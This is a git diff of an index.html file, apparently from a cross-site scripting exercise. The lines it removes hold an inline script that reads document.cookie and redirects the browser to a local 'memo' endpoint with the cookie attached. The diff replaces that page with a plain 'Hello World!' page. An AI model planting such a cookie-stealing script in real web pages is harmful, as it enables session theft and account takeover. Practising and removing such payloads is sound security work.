--- a/index.html
+++ b/index.html
@@ -1,26 +1,6 @@
-<!-- templates/index.html -->
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Index Page</title>
-</head>
-<body>
-
-    <h1>Welcome to the Index Page</h1>
-    
-    <p>This is a sample index page.</p>
-
-    <!-- JavaScript 코드 -->
-    <script>
-        // 쿠키 가져오기
-        var userCookie = document.cookie;
-
-        // 서버로 쿠키 전송
-        var url = "http://127.0.0.1:8000/memo?memo=" + userCookie;
-        location.href = url;
-    </script>
-
-</body>
+<!doctype html>
+<html>
+    <body>
+        <h1>Hello World!</h1>
+    </body>
 </html>
